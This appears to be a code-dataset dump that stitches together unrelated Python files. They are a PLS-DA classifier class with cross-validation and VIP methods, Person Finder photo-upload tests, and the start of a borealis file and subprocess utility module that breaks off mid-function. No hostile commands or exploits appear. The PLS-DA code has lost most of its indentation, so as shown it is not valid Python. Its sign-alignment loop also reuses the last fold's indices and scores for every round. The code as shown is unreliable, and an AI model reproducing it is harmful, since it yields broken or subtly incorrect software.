def score(self, x, y, sample_weight=None):
"""
Predict and calculate the R2 for the model using one of the data blocks (X or Y) provided.
Equivalent to the scikit-learn ClassifierMixin score method.
        :param x: data matrix to fit the PLS model
        :type x: numpy.ndarray, shape (rows : samples , columns : variables )
        :param y: target variable
        :type y: list or 1d array
        :param sample_weight: optional sample weights to use in scoring
        :type sample_weight: numpy.ndarray, shape [n_samples] or None, defaults to None
        :return R2X: the model's R2X, calculated by predicting X from Y and scoring
        :rtype: float
        :raise ValueError: If there are data mismatch issues with the provided data.
"""
try:
# return metrics.accuracy_score(y, self.predict(x), sample_weight=sample_weight)
return PyPLS.score(self, x, y, block_to_score='x')
except ValueError as verr:
raise verr
def predict(self, x):
"""
        predict the value of the target variable based on the predictive variable x
        :param x: data matrix to be fit
        :type x: numpy.ndarray, shape (rows : samples , columns : variables )
        :return: predicted class labels, as discrete values obtained via argmin
        :rtype: numpy.ndarray, shape (n_samples,)
        :raise ValueError: If no data matrix is passed, or there are dimension mismatch issues with the provided data.
        :raise AttributeError: Calling the method without fitting the model beforehand.
"""
try:
if self.isfitted is False:
raise AttributeError("Model is not fitted")
            # based on the original encoding as 0, 1 (binary classification)
if self.n_classes == 2:
y_pred = PyPLS.predict(self, x)
class_pred = np.argmin(np.abs(y_pred - np.array([0, 1])), axis=1)
else:
# multiclass classification
pred_scores = self.transform(x=x)
# encode the predicted variable
closest_class_mean = lambda x: np.argmin(np.linalg.norm((x - self.class_means), axis=1))
class_pred = np.apply_along_axis(closest_class_mean, axis=1, arr=pred_scores)
return class_pred
except ValueError as verr:
raise verr
except AttributeError as atter:
raise atter
def inverse_transform(self, t=None, u=None):
"""
        transform T and U scores back to X and Y
        :param t: T scores corresponding to the X data matrix, defaults to None
        :type t: numpy array
        :param u: Y scores corresponding to the Y data vector/matrix, defaults to None
        :type u: numpy array
        :return x: data matrix (rows : samples , columns : variables )
        :return y: dependent (target) variable
:rtype: numpy.ndarray, shape (n_samples, n_features) or None
:raise ValueError: If dimensions of input data are mismatched.
"""
try:
if self.isfitted is True:
if t is not None and u is not None:
                    raise ValueError('one of t or u must be None')
elif t is None and u is None:
                    raise ValueError('t and u cannot both be None')
                # If T is given, return the X prediction
elif t is not None:
# calculate x prediction
xpred = np.dot(t, self.loadings_p.T)
if self.x_scaler is not None:
xscaled = self.x_scaler.inverse_transform(xpred)
else:
xscaled = xpred
return xscaled
                # If U is given, return the Y prediction
                elif u is not None:
                    # calculate y based on the transpose of the q loadings
ypred = np.dot(u, self.loadings_q.T)
return ypred
except ValueError as verr:
raise verr
def transform(self, x=None, y=None):
"""
        calculate the U or T matrix, equivalent to sklearn's TransformerMixin
        :param x: data matrix to be fit
:type x: numpy.ndarray, shape (rows : samples , columns : variables )
:param y: target variable
:type y: list or 1d array
:return: Latent Variable scores (T) for the X matrix and for the Y vector/matrix (U).
:rtype: tuple with 2 numpy.ndarray, shape (n_samples, n_comps)
:raise ValueError: If dimensions of input data are mismatched.
:raise AttributeError: When calling the method before the model is fitted.
"""
try:
# Check if model is fitted or not
if self.isfitted is True:
# If X and Y are passed, complain and do nothing
if (x is not None) and (y is not None):
raise ValueError('one of the variable must be None')
# If nothing is passed at all, complain and do nothing
elif (x is None) and (y is None):
raise ValueError('both variables are set to None')
# If Y is given, return U
elif x is None:
# verify that y is a single vector
if y.ndim != 1:
raise TypeError('Please supply a dummy vector with integer as class membership')
                    # multiclass classification
if self.n_classes > 2:
y = self.y_scaler.transform(pd.get_dummies(y).values)
else:
                        # binary classification
if y.ndim == 1:
y = y.reshape(-1, 1)
y = self.y_scaler.transform(y)
U = np.dot(y, self.rotations_cs)
return U
# If X is given, return T
elif y is None:
                    # add an extra dimension to x if it's a vector
if x.ndim == 1:
x = x.reshape(-1, 1)
                    if self.x_scaler is None:
                        xscaled = x
                    else:
                        # use transform (not fit_transform) so the scaler fitted during fit() is not refit
                        xscaled = self.x_scaler.transform(x)
T = np.dot(xscaled, self.rotations_ws)
return T
else:
raise AttributeError('Model not fitted yet ')
except ValueError as verr:
raise verr
except AttributeError as atter:
raise atter
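    # Note on the cross-validation below: accumulating the predictive residual
    # sum of squares (PRESS) over the folds supports the standard Q2 statistic,
    # Q2Y = 1 - PRESSY / SSY (and analogously Q2X = 1 - PRESSX / SSX).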
def cross_validation(self, x, y, cv_method=KFold(7, shuffle=True), outputdist=False,
):
"""
        cross-validate the model and calculate Q2
        :param x: data matrix to be fit
        :type x: numpy.ndarray, shape (rows : samples , columns : variables )
        :param y: target variable
        :type y: list or 1d array
        :param cv_method: cross validation method
        :param bool outputdist: output the whole distribution; useful for ShuffleSplit or CrossValidators other than KFold, defaults to False
        :return: dict of cross validation scores
        :rtype: dict
:raise TypeError: If the cv_method passed is not a scikit-learn CrossValidator object.
:raise ValueError: If the x and y data matrices are invalid.
"""
try:
# Check if global model is fitted... and if not, fit it using all of X
if self.isfitted is False:
self.fit(x, y)
# Make a copy of the object, to ensure the internal state of the object is not modified during
# the cross_validation method call
cv_pipeline = deepcopy(self)
# Number of splits
ncvrounds = cv_method.get_n_splits()
            # Number of classes, to tell binary from multi-class discrimination parameter calculation
n_classes = np.unique(y).size
if x.ndim > 1:
x_nvars = x.shape[1]
else:
x_nvars = 1
# The y variable expected is a single vector with ints as class label - binary
# and multiclass classification are allowed but not multilabel so this will work.
            # But for the PLS part, in case of more than 2 classes, a dummy matrix is constructed and kept separately
# throughout
if y.ndim == 1:
# y = y.reshape(-1, 1)
if self.n_classes > 2:
y_pls = pd.get_dummies(y).values
y_nvars = y_pls.shape[1]
else:
y_nvars = 1
y_pls = y
else:
raise TypeError('Please supply a dummy vector with integer as class membership')
# Initialize list structures to contain the fit
cv_loadings_p = np.zeros((ncvrounds, x_nvars, self.ncomps))
cv_loadings_q = np.zeros((ncvrounds, y_nvars, self.ncomps))
cv_weights_w = np.zeros((ncvrounds, x_nvars, self.ncomps))
cv_weights_c = np.zeros((ncvrounds, y_nvars, self.ncomps))
cv_train_scores_t = list()
cv_train_scores_u = list()
# CV test scores more informative for ShuffleSplit than KFold but kept here anyway
cv_test_scores_t = list()
cv_test_scores_u = list()
cv_rotations_ws = np.zeros((ncvrounds, x_nvars, self.ncomps))
cv_rotations_cs = np.zeros((ncvrounds, y_nvars, self.ncomps))
cv_betacoefs = np.zeros((ncvrounds, y_nvars, x_nvars))
cv_vipsw = np.zeros((ncvrounds, x_nvars))
cv_trainprecision = np.zeros(ncvrounds)
cv_trainrecall = np.zeros(ncvrounds)
cv_trainaccuracy = np.zeros(ncvrounds)
cv_trainauc = np.zeros((ncvrounds, y_nvars))
cv_trainmatthews_mcc = np.zeros(ncvrounds)
cv_trainzerooneloss = np.zeros(ncvrounds)
cv_trainf1 = np.zeros(ncvrounds)
cv_trainclasspredictions = list()
cv_trainroc_curve = list()
cv_trainconfusionmatrix = list()
cv_trainmisclassifiedsamples = list()
cv_testprecision = np.zeros(ncvrounds)
cv_testrecall = np.zeros(ncvrounds)
cv_testaccuracy = np.zeros(ncvrounds)
cv_testauc = np.zeros((ncvrounds, y_nvars))
cv_testmatthews_mcc = np.zeros(ncvrounds)
cv_testzerooneloss = np.zeros(ncvrounds)
cv_testf1 = np.zeros(ncvrounds)
cv_testclasspredictions = list()
cv_testroc_curve = list()
cv_testconfusionmatrix = list()
cv_testmisclassifiedsamples = list()
# Initialise predictive residual sum of squares variable (for whole CV routine)
pressy = 0
pressx = 0
# Calculate Sum of Squares SS in whole dataset for future calculations
ssx = np.sum(np.square(cv_pipeline.x_scaler.fit_transform(x)))
ssy = np.sum(np.square(cv_pipeline.y_scaler.fit_transform(y_pls.reshape(-1, 1))))
            # R2X and R2Y assessed in the training set (as opposed to PRESS)
R2X_training = np.zeros(ncvrounds)
R2Y_training = np.zeros(ncvrounds)
# R2X and R2Y assessed in the test set
R2X_test = np.zeros(ncvrounds)
R2Y_test = np.zeros(ncvrounds)
x = np.array(x)
for cvround, train_testidx in enumerate(cv_method.split(x, y)):
# split the data explicitly
train = train_testidx[0]
test = train_testidx[1]
# Check dimensions for the indexing
ytrain = y[train]
ytest = y[test]
if x_nvars == 1:
xtrain = x[train]
xtest = x[test]
else:
xtrain = x[train, :]
xtest = x[test, :]
cv_pipeline.fit(xtrain, ytrain)
# Prepare the scaled X and Y test data
# Comply with the sklearn scaler behaviour
if xtest.ndim == 1:
xtest = xtest.reshape(-1, 1)
xtrain = xtrain.reshape(-1, 1)
                # Transform the test data with the scaler fitted on the training data
xtest_scaled = cv_pipeline.x_scaler.transform(xtest)
R2X_training[cvround] = PyPLS.score(cv_pipeline, xtrain, ytrain, 'x')
R2Y_training[cvround] = PyPLS.score(cv_pipeline, xtrain, ytrain, 'y')
if y_pls.ndim > 1:
yplstest = y_pls[test, :]
else:
yplstest = y_pls[test].reshape(-1, 1)
# Use super here for Q2
ypred = PyPLS.predict(cv_pipeline, x=xtest, y=None)
xpred = PyPLS.predict(cv_pipeline, x=None, y=ytest)
xpred = cv_pipeline.x_scaler.transform(xpred).squeeze()
ypred = cv_pipeline.y_scaler.transform(ypred).squeeze()
curr_pressx = np.sum(np.square(xtest_scaled - xpred))
curr_pressy = np.sum(np.square(cv_pipeline.y_scaler.transform(yplstest).squeeze() - ypred))
R2X_test[cvround] = PyPLS.score(cv_pipeline, xtest, yplstest, 'x')
R2Y_test[cvround] = PyPLS.score(cv_pipeline, xtest, yplstest, 'y')
pressx += curr_pressx
pressy += curr_pressy
cv_loadings_p[cvround, :, :] = cv_pipeline.loadings_p
cv_loadings_q[cvround, :, :] = cv_pipeline.loadings_q
cv_weights_w[cvround, :, :] = cv_pipeline.weights_w
cv_weights_c[cvround, :, :] = cv_pipeline.weights_c
cv_rotations_ws[cvround, :, :] = cv_pipeline.rotations_ws
cv_rotations_cs[cvround, :, :] = cv_pipeline.rotations_cs
cv_betacoefs[cvround, :, :] = cv_pipeline.beta_coeffs.T
cv_vipsw[cvround, :] = cv_pipeline.VIP()
# Training metrics
cv_trainaccuracy[cvround] = cv_pipeline.m_params['DA']['Accuracy']
cv_trainprecision[cvround] = cv_pipeline.m_params['DA']['Precision']
cv_trainrecall[cvround] = cv_pipeline.m_params['DA']['Recall']
cv_trainauc[cvround, :] = cv_pipeline.m_params['DA']['AUC']
cv_trainf1[cvround] = cv_pipeline.m_params['DA']['F1']
cv_trainmatthews_mcc[cvround] = cv_pipeline.m_params['DA']['MatthewsMCC']
cv_trainzerooneloss[cvround] = cv_pipeline.m_params['DA']['0-1Loss']
            # Check these indexes, same as CV scores
cv_trainmisclassifiedsamples.append(
train[cv_pipeline.m_params['DA']['MisclassifiedSamples']])
cv_trainclasspredictions.append(
[*zip(train, cv_pipeline.m_params['DA']['ClassPredictions'])])
cv_trainroc_curve.append(cv_pipeline.m_params['DA']['ROC'])
fpr_grid = np.linspace(0, 1, num=20)
y_pred = cv_pipeline.predict(xtest)
# Obtain the class score
class_score = PyPLS.predict(cv_pipeline, xtest)
if n_classes == 2:
test_accuracy = metrics.accuracy_score(ytest, y_pred)
test_precision = metrics.precision_score(ytest, y_pred)
test_recall = metrics.recall_score(ytest, y_pred)
test_f1_score = metrics.f1_score(ytest, y_pred)
test_zero_oneloss = metrics.zero_one_loss(ytest, y_pred)
test_matthews_mcc = metrics.matthews_corrcoef(ytest, y_pred)
test_roc_curve = metrics.roc_curve(ytest, class_score.ravel())
# Interpolated ROC curve and AUC
tpr = test_roc_curve[1]
fpr = test_roc_curve[0]
interpolated_tpr = np.zeros_like(fpr_grid)
interpolated_tpr += interp(fpr_grid, fpr, tpr)
test_roc_curve = (fpr_grid, interpolated_tpr, test_roc_curve[2])
test_auc_area = metrics.auc(fpr_grid, interpolated_tpr)
else:
test_accuracy = metrics.accuracy_score(ytest, y_pred)
test_precision = metrics.precision_score(ytest, y_pred, average='weighted')
test_recall = metrics.recall_score(ytest, y_pred, average='weighted')
test_f1_score = metrics.f1_score(ytest, y_pred, average='weighted')
test_zero_oneloss = metrics.zero_one_loss(ytest, y_pred)
test_matthews_mcc = np.nan
test_roc_curve = list()
test_auc_area = list()
                    # Generate multiple ROC curves - one for each class in the multi-class case
for predclass in range(cv_pipeline.n_classes):
roc_curve = metrics.roc_curve(ytest, class_score[:, predclass], pos_label=predclass)
# Interpolate all ROC curves to a finite grid
# Makes it easier to average and compare multiple models - with CV in mind
tpr = roc_curve[1]
fpr = roc_curve[0]
interpolated_tpr = np.zeros_like(fpr_grid)
interpolated_tpr += interp(fpr_grid, fpr, tpr)
                        test_roc_curve.append((fpr_grid, interpolated_tpr, roc_curve[2]))
test_auc_area.append(metrics.auc(fpr_grid, interpolated_tpr))
# TODO check the roc curve in train and test set
# Check the actual indexes in the original samples
test_misclassified_samples = test[np.where(ytest.ravel() != y_pred.ravel())[0]]
test_classpredictions = [*zip(test, y_pred)]
test_conf_matrix = metrics.confusion_matrix(ytest, y_pred)
# Test metrics
cv_testaccuracy[cvround] = test_accuracy
cv_testprecision[cvround] = test_precision
cv_testrecall[cvround] = test_recall
cv_testauc[cvround, :] = test_auc_area
cv_testf1[cvround] = test_f1_score
cv_testmatthews_mcc[cvround] = test_matthews_mcc
cv_testzerooneloss[cvround] = test_zero_oneloss
            # Check these indexes, same as CV scores
cv_testmisclassifiedsamples.append(test_misclassified_samples)
cv_testroc_curve.append(test_roc_curve)
cv_testconfusionmatrix.append(test_conf_matrix)
cv_testclasspredictions.append(test_classpredictions)
# Do a proper investigation on how to get CV scores decently
            # Align model parameters to account for sign indeterminacy.
            # The criterion used here is to select the sign that gives a profile more similar (by L1 distance) to the loadings
            # of the model fitted on the whole data. Any other parameter could be used, but since the loadings in X capture
            # the covariance structure in the X data block, in theory they should have more pronounced features even in cases of
            # null X-Y association, making the sign flip more resilient.
for cvround in range(0, ncvrounds):
for currload in range(0, self.ncomps):
# evaluate based on loadings _p
choice = np.argmin(
np.array([np.sum(np.abs(self.loadings_p[:, currload] - cv_loadings_p[cvround, :, currload])),
np.sum(np.abs(
self.loadings_p[:, currload] - cv_loadings_p[cvround, :, currload] * -1))]))
if choice == 1:
cv_loadings_p[cvround, :, currload] = -1 * cv_loadings_p[cvround, :, currload]
cv_loadings_q[cvround, :, currload] = -1 * cv_loadings_q[cvround, :, currload]
cv_weights_w[cvround, :, currload] = -1 * cv_weights_w[cvround, :, currload]
cv_weights_c[cvround, :, currload] = -1 * cv_weights_c[cvround, :, currload]
cv_rotations_ws[cvround, :, currload] = -1 * cv_rotations_ws[cvround, :, currload]
cv_rotations_cs[cvround, :, currload] = -1 * cv_rotations_cs[cvround, :, currload]
cv_train_scores_t.append([*zip(train, -1 * cv_pipeline.scores_t)])
cv_train_scores_u.append([*zip(train, -1 * cv_pipeline.scores_u)])
cv_test_scores_t.append([*zip(test, -1 * cv_pipeline.scores_t)])
cv_test_scores_u.append([*zip(test, -1 * cv_pipeline.scores_u)])
else:
cv_train_scores_t.append([*zip(train, cv_pipeline.scores_t)])
cv_train_scores_u.append([*zip(train, cv_pipeline.scores_u)])
cv_test_scores_t.append([*zip(test, cv_pipeline.scores_t)])
cv_test_scores_u.append([*zip(test, cv_pipeline.scores_u)])
# Calculate Q-squareds
q_squaredy = 1 - (pressy / ssy)
q_squaredx = 1 - (pressx / ssx)
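            # (A Q2 close to its R2 counterpart suggests good predictive power;
            # a Q2 much lower than R2 hints at overfitting.)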
# Store everything...
self.cvParameters = {'PLS': {'Q2X': q_squaredx, 'Q2Y': q_squaredy,
'MeanR2X_Training': np.mean(R2X_training),
'MeanR2Y_Training': np.mean(R2Y_training),
'StdevR2X_Training': np.std(R2X_training),
                                             'StdevR2Y_Training': np.std(R2Y_training),
'MeanR2X_Test': np.mean(R2X_test),
'MeanR2Y_Test': np.mean(R2Y_test),
'StdevR2X_Test': np.std(R2X_test),
'StdevR2Y_Test': np.std(R2Y_test)}, 'DA': {}}
# Means and standard deviations...
self.cvParameters['PLS']['Mean_Loadings_q'] = cv_loadings_q.mean(0)
self.cvParameters['PLS']['Stdev_Loadings_q'] = cv_loadings_q.std(0)
self.cvParameters['PLS']['Mean_Loadings_p'] = cv_loadings_p.mean(0)
            self.cvParameters['PLS']['Stdev_Loadings_p'] = cv_loadings_p.std(0)
self.cvParameters['PLS']['Mean_Weights_c'] = cv_weights_c.mean(0)
self.cvParameters['PLS']['Stdev_Weights_c'] = cv_weights_c.std(0)
self.cvParameters['PLS']['Mean_Weights_w'] = cv_weights_w.mean(0)
self.cvParameters['PLS']['Stdev_Weights_w'] = cv_weights_w.std(0)
self.cvParameters['PLS']['Mean_Rotations_ws'] = cv_rotations_ws.mean(0)
self.cvParameters['PLS']['Stdev_Rotations_ws'] = cv_rotations_ws.std(0)
self.cvParameters['PLS']['Mean_Rotations_cs'] = cv_rotations_cs.mean(0)
self.cvParameters['PLS']['Stdev_Rotations_cs'] = cv_rotations_cs.std(0)
self.cvParameters['PLS']['Mean_Beta'] = cv_betacoefs.mean(0)
self.cvParameters['PLS']['Stdev_Beta'] = cv_betacoefs.std(0)
self.cvParameters['PLS']['Mean_VIP'] = cv_vipsw.mean(0)
self.cvParameters['PLS']['Stdev_VIP'] = cv_vipsw.std(0)
self.cvParameters['DA']['Mean_MCC'] = cv_testmatthews_mcc.mean(0)
self.cvParameters['DA']['Stdev_MCC'] = cv_testmatthews_mcc.std(0)
self.cvParameters['DA']['Mean_Recall'] = cv_testrecall.mean(0)
self.cvParameters['DA']['Stdev_Recall'] = cv_testrecall.std(0)
self.cvParameters['DA']['Mean_Precision'] = cv_testprecision.mean(0)
self.cvParameters['DA']['Stdev_Precision'] = cv_testprecision.std(0)
self.cvParameters['DA']['Mean_Accuracy'] = cv_testaccuracy.mean(0)
self.cvParameters['DA']['Stdev_Accuracy'] = cv_testaccuracy.std(0)
self.cvParameters['DA']['Mean_f1'] = cv_testf1.mean(0)
self.cvParameters['DA']['Stdev_f1'] = cv_testf1.std(0)
self.cvParameters['DA']['Mean_0-1Loss'] = cv_testzerooneloss.mean(0)
self.cvParameters['DA']['Stdev_0-1Loss'] = cv_testzerooneloss.std(0)
self.cvParameters['DA']['Mean_AUC'] = cv_testauc.mean(0)
self.cvParameters['DA']['Stdev_AUC'] = cv_testauc.std(0)
self.cvParameters['DA']['Mean_ROC'] = np.mean(np.array([x[1] for x in cv_testroc_curve]), axis=0)
self.cvParameters['DA']['Stdev_ROC'] = np.std(np.array([x[1] for x in cv_testroc_curve]), axis=0)
# TODO add cv scores averaging and stdev properly
# Means and standard deviations...
# self.cvParameters['Mean_Scores_t'] = cv_scores_t.mean(0)
# self.cvParameters['Stdev_Scores_t'] = cv_scores_t.std(0)
# self.cvParameters['Mean_Scores_u'] = cv_scores_u.mean(0)
# self.cvParameters['Stdev_Scores_u'] = cv_scores_u.std(0)
# Save everything found during CV
if outputdist is True:
self.cvParameters['PLS']['CVR2X_Training'] = R2X_training
self.cvParameters['PLS']['CVR2Y_Training'] = R2Y_training
self.cvParameters['PLS']['CVR2X_Test'] = R2X_test
self.cvParameters['PLS']['CVR2Y_Test'] = R2Y_test
self.cvParameters['PLS']['CV_Loadings_q'] = cv_loadings_q
self.cvParameters['PLS']['CV_Loadings_p'] = cv_loadings_p
self.cvParameters['PLS']['CV_Weights_c'] = cv_weights_c
self.cvParameters['PLS']['CV_Weights_w'] = cv_weights_w
self.cvParameters['PLS']['CV_Rotations_ws'] = cv_rotations_ws
self.cvParameters['PLS']['CV_Rotations_cs'] = cv_rotations_cs
self.cvParameters['PLS']['CV_TestScores_t'] = cv_test_scores_t
self.cvParameters['PLS']['CV_TestScores_u'] = cv_test_scores_u
self.cvParameters['PLS']['CV_TrainScores_t'] = cv_train_scores_t
self.cvParameters['PLS']['CV_TrainScores_u'] = cv_train_scores_u
self.cvParameters['PLS']['CV_Beta'] = cv_betacoefs
self.cvParameters['PLS']['CV_VIPw'] = cv_vipsw
# CV Test set metrics - The metrics which matter to benchmark classifier
self.cvParameters['DA']['CV_TestMCC'] = cv_testmatthews_mcc
self.cvParameters['DA']['CV_TestRecall'] = cv_testrecall
self.cvParameters['DA']['CV_TestPrecision'] = cv_testprecision
self.cvParameters['DA']['CV_TestAccuracy'] = cv_testaccuracy
self.cvParameters['DA']['CV_Testf1'] = cv_testf1
self.cvParameters['DA']['CV_Test0-1Loss'] = cv_testzerooneloss
self.cvParameters['DA']['CV_TestROC'] = cv_testroc_curve
self.cvParameters['DA']['CV_TestConfusionMatrix'] = cv_testconfusionmatrix
self.cvParameters['DA']['CV_TestSamplePrediction'] = cv_testclasspredictions
self.cvParameters['DA']['CV_TestMisclassifiedsamples'] = cv_testmisclassifiedsamples
self.cvParameters['DA']['CV_TestAUC'] = cv_testauc
# CV Train parameters - so we can keep a look on model performance in training set
self.cvParameters['DA']['CV_TrainMCC'] = cv_trainmatthews_mcc
self.cvParameters['DA']['CV_TrainRecall'] = cv_trainrecall
self.cvParameters['DA']['CV_TrainPrecision'] = cv_trainprecision
self.cvParameters['DA']['CV_TrainAccuracy'] = cv_trainaccuracy
self.cvParameters['DA']['CV_Trainf1'] = cv_trainf1
self.cvParameters['DA']['CV_Train0-1Loss'] = cv_trainzerooneloss
self.cvParameters['DA']['CV_TrainROC'] = cv_trainroc_curve
self.cvParameters['DA']['CV_TrainConfusionMatrix'] = cv_trainconfusionmatrix
self.cvParameters['DA']['CV_TrainSamplePrediction'] = cv_trainclasspredictions
self.cvParameters['DA']['CV_TrainMisclassifiedsamples'] = cv_trainmisclassifiedsamples
self.cvParameters['DA']['CV_TrainAUC'] = cv_trainauc
return None
except TypeError as terp:
raise terp
def VIP(self, mode='w', direction='y'):
"""
calculate the variable importance parameters to get the most important variable used by the model
:param mode: The type of model parameter to use in calculating the VIP. Default value is weights (w), and other acceptable arguments are p, ws, cs, c and q.
defaults to 'w'
:type mode: str
:param str direction: The data block to be used to calculated the model fit and regression sum of squares defaults to 'y'
:return numpy.ndarray VIP: The vector with the calculated VIP values.
:rtype: numpy.ndarray, shape [n_features]
:raise ValueError: If mode or direction is not a valid option.
:raise AttributeError: Calling method without a fitted model.
"""
try:
# Code not really adequate for each Y variable in the multi-Y case - SSy should be changed so
# that it is calculated for each y and not for the whole block
if self.isfitted is False:
raise AttributeError("Model is not fitted")
if mode not in ['w', 'p', 'ws', 'cs', 'c', 'q']:
raise ValueError("Invalid type of VIP coefficient")
if direction not in ['x', 'y']:
raise ValueError("direction must be x or y")
choices = {'w': self.weights_w, 'p': self.loadings_p, 'ws': self.rotations_ws, 'cs': self.rotations_cs,
'c': self.weights_c, 'q': self.loadings_q}
if direction == 'y':
ss_dir = 'SSYcomp'
else:
ss_dir = 'SSXcomp'
nvars = self.loadings_p.shape[0]
vipnum = np.zeros(nvars)
for comp in range(0, self.ncomps):
vipnum += (choices[mode][:, comp] ** 2) * (self.m_params['PLS'][ss_dir][comp])
vip = np.sqrt(vipnum * nvars / self.m_params['PLS'][ss_dir].sum())
return vip
except AttributeError as atter:
raise atter
except ValueError as verr:
raise verr
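    # Example usage (a sketch, assuming a fitted PyPLS_DA instance `plsda`):
    #   vips = plsda.VIP(mode='w', direction='y')
    #   top10 = np.argsort(vips)[::-1][:10]  # indices of the ten highest-VIP variables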
    def permutation_test(self, x, y, nb_perm=20):
        """
        Permutation test; this function is still in development.
        """
        return None
def inertia_barplot(self, x, y):
"""
interia plot to get the goodness of the fit R2 and the goodness of prediction Q2 with each number of componant
:param x: data metrix to be fit
:type x: numpy.ndarray, shape (rows : samples , columns : variables )
:param y: target variable
:type y: list or 1d array
"""
Q2_scores = []
R2_scores = []
for i in range(1, self.ncomps + 1):
            # scores = cross_validate(pls_binary, X=df, y=Y1, scoring=scoring, cv=7, n_jobs=-1, verbose=2, return_train_score=True)
            # create a new instance with a different number of components
plsda = PyPLS_DA(i)
plsda.fit(x, y)
plsda.cross_validation(x, y)
R2_scores.append(plsda.m_params["PLS"]['R2Y'])
Q2_scores.append(plsda.cvParameters['PLS']['Q2Y'])
features = np.arange(len(Q2_scores))
plt.bar(features - 0.2, R2_scores, 0.4, label='R2')
plt.bar(features + 0.2, Q2_scores, 0.4, label='Q2')
plt.legend()
        plt.title('inertia plot')
def score_plot(self, y):
"""
PLS_DA sore plot gives the projection of the simples on the first 2 componants (latent variables )
:param x: data metrix to be fit
:type x: numpy.ndarray, shape (rows : samples , columns : variables )
:param y: target variable
:type y: list or 1d array
"""
try:
            if not self.isfitted:
                raise AttributeError("Model is not fitted yet")
targets = np.unique(y)
colors = ['r', 'g']
for target, color in zip(targets, colors):
indicesToKeep = [x for x in np.arange(self.scores_t.shape[0]) if y[x] == target]
plt.scatter(self.scores_t[indicesToKeep, 0]
, self.scores_t[indicesToKeep, 1]
, c=color, label='class ' + str(target), s=100, edgecolors='k',
)
for i in range(self.scores_t.shape[0]):
plt.text(x=self.scores_t[i, 0] + 0.3, y=self.scores_t[i, 1] + 0.3, s=i + 1)
plt.xlabel('LV 1')
plt.ylabel('LV 2')
plt.legend()
plt.title('PLS-DA score plot')
plt.show()
except AttributeError as atter:
raise atter
except TypeError as typer:
raise typer
``` |
{
"source": "1Firsts/personfinder",
"score": 2
} |
#### File: tests/server_test_cases/photo_tests.py
```python
from google.appengine.api import images
from photo import MAX_IMAGE_DIMENSION
from server_tests_base import ServerTestsBase
class PhotoTests(ServerTestsBase):
"""Tests that verify photo upload and serving."""
def submit_create(self, **kwargs):
doc = self.go('/haiti/create?role=provide')
form = doc.cssselect_one('form')
return self.s.submit(form,
given_name='_test_given_name',
family_name='_test_family_name',
author_name='_test_author_name',
text='_test_text',
**kwargs)
def test_upload_photo(self):
"""Verifies a photo is uploaded and properly served on the server."""
# Create a new person record with a profile photo.
photo = file('tests/testdata/small_image.png')
original_image = images.Image(photo.read())
doc = self.submit_create(photo=photo)
# Verify the image is uploaded and displayed on the view page.
photo = doc.cssselect_one('img.photo')
photo_anchor = doc.xpath_one('//a[img[@class="photo"]]')
# Verify the image is served properly by checking the image metadata.
doc = self.s.go(photo.get('src'))
image = images.Image(doc.content_bytes)
assert image.format == images.PNG
assert image.width == original_image.width
assert image.height == original_image.height
# Follow the link on the image and verify the same image is served.
doc = self.s.follow(photo_anchor)
image = images.Image(doc.content_bytes)
assert image.format == images.PNG
assert image.width == original_image.width
assert image.height == original_image.height
def test_upload_photos_with_transformation(self):
"""Uploads both profile photo and note photo and verifies the images are
properly transformed and served on the server i.e., jpg is converted to
png and a large image is resized to match MAX_IMAGE_DIMENSION."""
# Create a new person record with a profile photo and a note photo.
photo = file('tests/testdata/small_image.jpg')
note_photo = file('tests/testdata/large_image.png')
original_image = images.Image(photo.read())
doc = self.submit_create(photo=photo, note_photo=note_photo)
# Verify the images are uploaded and displayed on the view page.
photos = doc.cssselect('img.photo')
assert len(photos) == 2
# Verify the profile image is converted to png.
doc = self.s.go(photos[0].get('src'))
image = images.Image(doc.content_bytes)
assert image.format == images.PNG
assert image.width == original_image.width
assert image.height == original_image.height
# Verify the note image is resized to match MAX_IMAGE_DIMENSION.
doc = self.s.go(photos[1].get('src'))
image = images.Image(doc.content_bytes)
assert image.format == images.PNG
assert image.width == MAX_IMAGE_DIMENSION
assert image.height == MAX_IMAGE_DIMENSION
def test_upload_empty_photo(self):
"""Uploads an empty image and verifies no img tag in the view page."""
# Create a new person record with a zero-byte profile photo.
photo = file('tests/testdata/empty_image.png')
doc = self.submit_create(photo=photo)
# Verify there is no img tag in the view page.
assert '_test_given_name' in doc.text
assert not doc.cssselect('img.photo')
def test_upload_broken_photo(self):
"""Uploads a broken image and verifies an error message is displayed."""
# Create a new person record with a broken profile photo.
photo = file('tests/testdata/broken_image.png')
doc = self.submit_create(photo=photo)
# Verify an error message is displayed.
assert not doc.cssselect('img.photo')
assert 'unrecognized format' in doc.text
``` |
{
"source": "1fish2/borealis",
"score": 3
} |
#### File: borealis/util/filepath.py
```python
from __future__ import absolute_import, division, print_function
import errno
import logging
import os
import sys
if os.name == 'posix' and sys.version_info[0] < 3:
import subprocess32 as subprocess
else:
import subprocess
from typing import Optional, Sequence, Tuple
TIMEOUT = 60 # seconds
def makedirs(path, *paths):
# type: (str, *str) -> str
"""Join one or more path components, make that directory path (using the
default mode 0o0777), and return the joined path.
Raise OSError if it can't achieve the result (e.g. the containing directory
is readonly or the path contains a file); not if the directory already
exists.
"""
full_path = os.path.join(path, *paths)
try:
if full_path:
os.makedirs(full_path)
except OSError as e:
if e.errno != errno.EEXIST or not os.path.isdir(full_path):
raise
return full_path
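# Example (sketch): makedirs('/tmp', 'a', 'b') returns '/tmp/a/b', creating the
# intermediate directories if they do not already exist.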
def run_cmd2(tokens, trim=True, timeout=TIMEOUT):
# type: (Sequence[str], bool, Optional[int]) -> Tuple[str, str]
"""Run a shell command-line (in token list form) and return a tuple
containing its (stdout, stderr).
This does not expand filename patterns or environment variables or do other
shell processing steps.
Args:
tokens: The command line as a list of string tokens.
trim: Whether to trim off trailing whitespace. This is useful
because the outputs usually end with a newline.
timeout: timeout in seconds; None for no timeout.
Returns:
The command's stdout and stderr strings.
Raises:
OSError (e.g. FileNotFoundError [Python 3] or PermissionError),
subprocess.SubprocessError (TimeoutExpired or CalledProcessError)
"""
out = subprocess.run(
tokens,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
check=True,
universal_newlines=True,
timeout=timeout)
if trim:
return out.stdout.rstrip(), out.stderr.rstrip()
return out.stdout, out.stderr
def run_cmd(tokens, trim=True, timeout=TIMEOUT):
# type: (Sequence[str], bool, Optional[int]) -> str
"""Run a shell command-line (in token list form) and return its stdout.
See run_cmd2().
"""
return run_cmd2(tokens, trim=trim, timeout=timeout)[0]
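# Example (sketch):
#   out = run_cmd(['echo', 'hello'])  # -> 'hello' (trailing newline trimmed)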
def run_cmdline(line, trim=True, timeout=TIMEOUT):
# type: (str, bool, Optional[int]) -> Optional[str]
